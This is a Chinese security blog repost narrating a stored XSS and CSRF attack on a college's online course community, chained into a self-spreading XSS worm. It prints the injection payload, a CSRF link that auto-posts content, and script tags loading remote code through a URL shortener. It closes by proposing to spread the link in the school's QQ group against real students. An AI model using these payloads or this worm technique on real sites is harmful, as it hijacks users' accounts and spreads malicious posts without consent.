【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)
2022-7-23 08:4:50 Author: 雾晓安全(查看原文) 阅读量:12 收藏

0x00 存储XSS

1) 可绕过的XSS

给大家分享个漏洞案例,今天上午刚把电脑修好
某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)
注册处:http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过
储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先过滤再输出,而不是输出时过滤,从而导致可绕过 


我们发现他输入时就进行了过滤,直接替换<script>alert('XSS')</script>成功弹框:

0x01 CSRF配合XSS蠕虫

同样是这个位置,发表话题,改成get请求 

得到连接:
CSRF:

http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE

点击链接会自动发表内容
我们缩短一下链接 网上有在线缩短的,缩短后链接http://suo.im/abc
构造一下csrf连接:<script src=http://suo.im/abc></script>(插入到网页当中,当别人访问你的个人中心,会自动发表一个内容)
接着我们继续构造,找到CSRF漏洞处,把后面的内容替换为CSRF链接,也就是访问此连接会自动发表内容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

继续缩短网址:
缩短后:http://suo.im/XXXX这个时候我们再调用一下CSRF+XSS的地址:

<script src=http://suo.im/XXXX></script>

把这个链接插入到网页当中即可完成XSS蠕虫攻击
当A访问你的主页时,A会发表和你一样的内容,当B访问A的主页时,B会发表和A一样的内容,同理,完成XSS蠕虫攻击

最后的思路就是自己构造个网站,加这个学校的QQ群,发送链接哈哈。

往期推荐 

// 1

(总结)绕过CDN查找真实IP

// 2

盘点那些Wifi破解姿势(2)

// 3

验证码绕过思路总结

// 4

一次实战挖掘软件逻辑漏洞


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247493337&idx=3&sn=9fb9afc783f90f7f6f3c3209a05e78b9&chksm=ce68295ff91fa0498bc31f1488da7595b37202f172152cdb63192c8cbc78446a0f24fdbce538#rd
如有侵权请联系:admin#unsafe.sh